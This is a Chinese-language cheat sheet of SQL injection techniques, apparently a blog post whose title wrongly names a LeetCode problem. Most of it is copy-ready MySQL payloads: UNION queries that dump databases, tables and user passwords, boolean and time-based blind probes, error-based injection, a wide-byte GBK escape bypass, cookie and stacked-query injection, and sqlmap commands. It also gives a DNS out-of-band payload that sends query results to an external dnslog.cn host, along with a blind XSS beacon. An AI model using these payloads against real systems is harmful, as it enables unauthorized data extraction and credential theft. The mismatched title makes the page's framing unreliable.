刷題-力扣-116. 填充每個節點的下一個右側節點指標
SQL注入定義:
SQL注入即是指web應用程式對使用者輸入資料的合法性沒有判斷或過濾不嚴,攻擊者可以在web應用程式中事先定義好的查詢語句的結尾上新增額外的SQL語句,在管理員不知情的情況下實現非法操作,以此來實現欺騙資料庫伺服器執行非授權的任意查詢,從而進一步得到相應的資料資訊。
注入型別:
當輸入引數為字串時,稱為字元型。數字型與字元型注入最大的區別在於:數字型不需要單引號閉合,而字串型別一般要使用單引號來閉合。
判斷資料庫型別:
判斷是否是 Mysql資料庫
' and exists(select*from information_schema.tables) --+
判斷是否是 access資料庫
' and exists(select*from msysobjects) --+
判斷是否是 Sqlserver資料庫
' and exists(select*from sysobjects) --+
判斷是否是Oracle資料庫
' and (select count(*) from dual)>0 --+
判斷注入點
數字型:id=2-1(在URL編碼中+代表空格,可能會造成混淆)
字元型:' 、')、 '))、 "、 ")、 "))
註釋符:--空格、--+、/**/、#
UNION注入:
union聯合查詢適用於有顯示列的注入,可以通過order by來判斷當前表的列數
因為頁面只顯示一行資料,所以union注入需要將前面的條件否定(把引數變為負)
union注入可能需要用到的一些資訊:
version() :資料庫的版本
database() :當前所在的資料庫
@@basedir : 資料庫的安裝目錄
@@datadir : 資料庫檔案的存放目錄
user() : 資料庫的使用者
current_user() : 當前使用者名稱
system_user() : 系統使用者名稱
session_user() :連線到資料庫的使用者名稱
MYSQL5.0以下沒有information_schema這個系統表,無法列表名等,只能暴力跑表名。,5.0以下是多使用者單操作,5.0以上是多使用者多操做。
獲得所有的資料庫
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+
獲得所有的表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables --+
獲得指定資料庫所有的表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
獲得所有的列
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns --+
獲得指定資料庫指定表的列
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
獲取具體欄位
?id=-1' union select 1,group_concat(id,'--',username,'--',password),3 from users --+
獲取當前資料庫中指定表的指定欄位的值(只能是database()所在的資料庫內的資料,因為處於當前資料庫下的話不能查詢其他資料庫內的資料)
?id=-1' union select 1,group_concat(password),3 from users --+
盲注:
**判斷是否存在延時注入:**
http://127.0.0.1/mysql/Less-1/?id=1' and sleep(5) --+
http://127.0.0.1/mysql/Less-1/?id=1' and benchmark(100000000,md5(1)) --+
**判斷當前資料庫**
布林盲注
資料庫database()的長度大於10
'and (length(database()))>10 --+
資料庫database()的第一個字元ascii值大於100
' and ascii(substr(database(),1,1))>100 --+
時間盲注
資料庫database()的長度大於10
' and if((length(database())>10),1,sleep(5)) --+
資料庫的第一個字元的ascii值小於100
' and if((ascii(substring(database(),1,1)))<100,1,sleep(5)) --+
**判斷當前資料庫中的表**
布林盲注
判斷當前資料庫中的表的個數是否大於5
' and (select count(table_name) from information_schema.tables where table_schema=database())>5 --+
判斷第一個表的長度
' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6 --+
判斷第一個表的第一個字元的ascii值
' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100 --+
時間盲注
判斷當前資料庫中的表的個數是否大於5
' and if((select count(table_name) from information_schema.tables where table_schema=database())>5,1,sleep(5)) --+
判斷第一個表的長度
' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>6,1,sleep(5)) --+
判斷第一個表的第一個字元的ascii值
' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,1,sleep(5)) --+
**判斷表中的欄位**
布林盲注
如果已經證實了存在users表,那麼猜測是否存在username欄位
' and exists(select username from users) --+
判斷表中欄位的個數
' and (select count(column_name) from information_schema.columns where table_name='users')>5 --+
判斷第一個欄位的長度
' and length((select column_name from information_schema.columns where table_name='users' limit 0,1))>5 --+
判斷第一個欄位第一個字元的ascii值
' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100 --+
時間盲注
如果已經證實了存在users表,那麼猜測是否存在username欄位
' and if(exists(select username from users),1,sleep(5)) --+
判斷表中欄位的個數
' and if((select count(column_name) from information_schema.columns where table_name='users')>5,1,sleep(5)) --+
判斷第一個欄位的長度
' and if(length((select column_name from information_schema.columns where table_name='users' limit 0,1))>5,1,sleep(5)) --+
判斷第一個欄位第一個字元的ascii值
' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100,1,sleep(5)) --+
**判斷欄位中的資料**
布林盲注
判斷第一個資料的長度
' and length(select id from users limit 0,1)>5 --+
判斷第一個資料第一個字元的ascii值
' and ascii(substr((select id from users limit 0,1),1,1))>100 --+
時間盲注
判斷第一個資料的長度
' and if(length(select id from users limit 0,1)>5,1,sleep5()) --+
判斷第一個資料第一個字元的ascii值
' and if(ascii(substr((select id from users limit 0,1),1,1))>100,1,sleep(5)) --+
使用正則表示式進行盲注
判斷第一個表名的第一個字元是否是a-z中的字元
http://127.0.0.1/mysql/Less-2/?id=1and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '[1]' LIMIT 0,1) --+
然後依據頁面回顯判斷是否正確,最後得到第一個字元為e
然後判斷第一個表名的第二個字元是否是a-z中的字元
http://127.0.0.1/mysql/Less-2/?id=1and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^e[a-z]') --+
依次猜第三個第四個字元!
DNS外帶注入
在實際測試一些網站的安全性問題的時候,有些測試命令執行後是無回顯的,可以寫指令碼來進行盲注,但有些網站會封禁掉ip地址,這樣可以通過設定ip代理池解決,但是遇到盲注往往效率很低,所以產生了DNSlog注入。
MySQL通過DNSlog盲注需要用到load_file()函式,該函式不僅能載入本地檔案,同時也能對URL發起請求。因為需要使用load_file()函式,所以需要root許可權,並且secure_file_priv需要為空
Payload:
(SELECT LOAD_FILE(CONCAT('\\\\',(要查詢的語句),'.xx.xx.xx\\abc')))
執行的語句:
重新整理dns平臺:
因為Linux沒有UNC路徑這個東西,所以當MySQL處於Linux系統中的時候,是不能使用這種方式外帶資料的 ,這也就解釋了為什麼CONCAT()函式拼接了4個\了,因為轉義的原因,4個就變\成了2個\,目的就是利用UNC路徑。
首先獲取一個dnslog地址,然後拼接到sql語句中。
當資料傳送後,dnsLog被記錄下來。
也可以在命令之中用HEX編碼。Hex編碼的目的就是減少干擾,因為很多事資料庫欄位的值可能是有特殊符號的,這些特殊符號拼接在域名裡無法做dns查詢,因為域名是有一定的規範,有些特殊符號不能帶入。
http://127.0.0.1/mysql/Less-1/?id=1' and (select load_file(concat('\\',hex((select table_name from information_schema.tables where table_schema=database() limit 1)),'.x14y65.dnslog.cn\abc')))%23
解碼後得到第一個表名
當然通過DNSlog也可以盲打xss
payload:
<img src=http://rep964.dnslog.cn>
DNSLog平臺收到的DNS查詢,即可證明存在XSS
報錯注入
floor報錯原理
需要用到count(),floor(rand()2),group by這些方法,來看一下都有什麼用。
floor作用是向下取整
rand()表示0-1隨機數,rand()*2就相當於0-2的隨機數,每次運算結果都不同
先查詢users表中資料
floor(rand(0)*2) 每次的結果是隨機的(users表中有13條資料)
而當提供了引數0後,floor(rand(0)*2)的每次結果都相同(users表中有13條資料)
count(*)表示欄位數
group by表示以誰來排序,比如
下面這個依照group by生成的相當於一個新表,先掃描password欄位,如果這個欄位不存在就插入,然後把count(*)置為1。像password為admin2有兩個使用者,第二個使用者插入的時候已經有admin2這個欄位了,也就不會重新生成一個新的admin2欄位,而是在count(*)的基礎上加1,直到依照password掃描完整個表,就形成了以password排序的新表了。
關鍵點:
1.group by後面的主鍵是不能重複的,這是floor報錯的關鍵點
2.在執行group by語句時,group by 後面的欄位會被運算兩次
第一次運算:group by拿到欄位後在表內對比,如果後面欄位已經存在,直接插入,不進行二次運算
第二次運算:如果order by後面的欄位不存在,則進行二次運算,由於ran()的隨機性,第二次的運算和第一次可能不一樣,這時候插入可能會導致錯誤的產生。
由於 select floor(rand(0)*2) from users每次結果都相同比較好比較,所以就拿這個查詢語句來做演示
select count(*),(concat(floor(rand(0)*2),'@',(select version())))x from users group by x
因為users有13個欄位,(floor(rand(0)*2)由上面的圖也已經確定了為0,1,1,0,1,1,0,0,1,1,1,0,1。
查詢的第一項:
floor(rand(0)*2)=0,結果為[email protected],因為表中還沒有這個值,所以會直接插入,count(*)置為1
但是依照上面第2條關鍵點,在插入前會進行兩次計算第二次運算的時候(floor(rand(0)*2)已經變為1了,所以這張表會先變為
1
2
x count(*)
[email protected] 1
查詢的第二項:
因為第一個插入進行了兩次運算,所以floor(rand(0)*2)=1,結果就為[email protected],因為表中x已經有了 [email protected]這個欄位,依照上面的第2個關鍵點,直接插入,不進行第二次運算。所以這張表會再變為
1
2
x count(*)
[email protected] 2
查詢的第三項:
前面兩次進行了三次運算,這次floor(rand(0)*2)=0,結果為[email protected],表中沒有這個欄位,會直接插入,count(*)置為1
但是依照上面第2條關鍵點,在插入前會進行兩次計算第二次運算的時候(floor(rand(0)*2)已經變為1,相應的欄位就變為了[email protected]。這個時候問題就來了:
表中已經有以[email protected]為主鍵的資料了,插入失敗,然後就報錯了。
payload:
select count(*),(concat(floor(rand(0)*2),'@',(select version())))x from users group by x
跟前面的查詢語句也是一個道理,只是floor(rand()*2)沒有floor(rand(0)*2)穩定
ExtractValue報錯原理
extractvalue()是對XML文件進行查詢的函式
語法為:extractvalue(目標xml文件,xml路徑)
第二個引數 xml中的位置是可操作的地方,xml文件中查詢字元位置是用 /aa/bb/cc/dd/a這種路徑或者純英文純數字格式,但是寫入其他格式就會報錯,並且會返回寫入的非法格式內容,
所以可以把想要得到的資料寫到xml路徑中從而返回該資料。
可以看到只要路徑滿足條件無論結果是否有值都不會報錯,而這裡version()已經報錯了,說明路徑也不能存在點號。
可以以不是xml格式的語法的內容開頭,然後報錯,但是會顯示無法識別的內容是什麼,這樣就達到了目的。
extractvalue()能查詢字串的最大長度為32,就是說如果我們想要的結果超過32,就需要用substring()函式擷取,一次檢視32位:
payload:
select username from users where id=1 and (extractvalue('anything',concat('#',substring(hex((select database())),1,32)))
UpdateXml報錯原理
updatexml()函式跟extractvalue()類似,是XML文件進行查詢的函式。
語法為:updatexml(目標xml文件,xml路徑,更新的內容)
報錯方式也類似,滿足/aa/bb/cc,全數字,全英文
payload:
select username from users where id=1 and (updatexml('anything',concat('+',(select database())),'anything'));
利用:
就用爆當前資料庫做演示,其他的語句大同小異
floor報錯注入:
' and (select 1 from (select count(),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()2))name from information_schema.tables group by name)b) --+
ExtractValue報錯注入:
' and extractvalue(1, concat(0x7e, (select database()),0x7e))--+
能查詢字串的最大長度為32,如果長度大於32位分段讀取
' and (extractvalue('anything',concat('#',substring(hex((select database())),1,32))))--+
UpdateXml報錯注入:
' and 1=(updatexml(1,concat(0x3a,(select database()),0x3a),1)) --+
寬位元組注入:
Mysql在使用GBK編碼時,會認為兩個字元為一個漢字。寬位元組注入就是發生在PHP向Mysql請求時字符集使用了GBK編碼。
關於寬位元組注入的幾個函式:
addslashes() :預定義字元之前新增反斜槓 \ 。預定義字元: 單引號 ' 、雙引號 " 、反斜槓 \ 、NULL。但是這個函式有一個特點就是雖然會新增反斜槓 \ 進行轉義,但是 \ 並不會插入到資料庫中。這個和魔術引號的作用完全相同。所以,如果魔術引號打開了,就不要使用 addslashes() 函數了。
mysql_real_escape_string() :這個函式用來轉義sql語句中的特殊符號x00 、\n 、\r 、\ 、‘ 、“ 、x1a。
magic_quotes_gpc(魔術引號):當開啟時,所有的單引號’ 、雙引號" 、反斜槓\ 和 NULL 字元都會被自動加上一個反斜線來進行轉義,
這三個函式都會把'轉義,會轉義成 \'。
當對使用者輸入的id用 addslashes() 函式進行了處理,並執行id=1'--+時,MySQL實際執行的語句是id='1\'--+
很明顯這是沒有注入成功的,單引號並沒有閉合。
這裡需要利用到MySQL的一個特性。MySQL在使用GBK編碼的時候,會認為兩個字元是一個漢字,前提是前一個字元的 ASCII 值大於128,才會認為是漢字。
當提交的是 id=1%df'--+時,MySQL執行的語句就會變成id='1%df%5c%27--+ ,MySQL正是把%df%5c當成了漢字 運 來處理,所以最後 %27 也就是單引號逃脫了出來,這樣就發生了報錯。
寬位元組修復:
1.使用 mysql_real_escape_string()
在執行 sql 注入之前必須使用 mysql_set_charset 指定 php 連線 mysql 的字符集,單獨呼叫 mysql_real_escape_string 是無法防禦的
2.將 character_set_client 設定為binary(二進位制)。
cookie注入
先訪問帶引數的網址127.0.0.1/product_list.asp?smallclass=148
去掉引數:127.0.0.1/product_list.asp?
檢視頁面顯示是否正常,如果不正常,說明引數在資料傳遞中是直接起作用的
f12輸入:alert(document.cookie="smallclass="+escape("148"));
會出現一個彈窗。
127.0.0.1/product_list.asp?頁面重新整理後網站顯示正常。
接下來:
1.輸入:javascript:alert(document.cookie="smallclass="+escape("148 and 1=1"));
彈窗,然後輸入127.0.0.1product_list.asp頁面正常。
2.輸入javascript:alert(document.cookie="smallclass="+escape("148 and 1=2"));
彈窗,再輸入127.0.0.1/product_list.asp頁面不正常
現在可以確定該網站存在注入漏洞,並且可以通過Cookie進行注入。
然後換語句猜解欄位數:
javascript:alert(document.cookie="smallclass="+escape("148 order by 12"));
或者使用sqlmap後加入引數 --cookie "smallclass=148" --table --level 2
堆疊注入:
堆疊注入(Stacked injections)就是將多條sql語句以;分隔,並同時執行多條任意語句。
查詢users表並建立一個跟users類似的表
select * from users where id=1;create table test123 like users;
看是否建立成功:
二次編碼注入:
漏洞產生原因:
後端程式的編碼函式,如urldecode(),rawurldecode()等,與PHP本身處理編碼時,放在了一個尷尬的使用位置,與PHP自身編碼配合失誤,其本質就是將%2527先解碼成%27再解碼成單引號
例項:
如果提交:http://127.0.0.1/sql.php?id=1%27
就可以繞過對'的轉義,從而造成了sql注入攻擊
在測試時,如果發現了頁面可能存在二次編碼注入漏洞,可在注入點後加上%2527然後用sqlmap跑
python3 sqlmap.py -u "http://127.0.0.1/erci.php?id=1%27*"
或者使用自帶的指令碼chardoubleencode.py進行注入
暫時就這幾個。。。。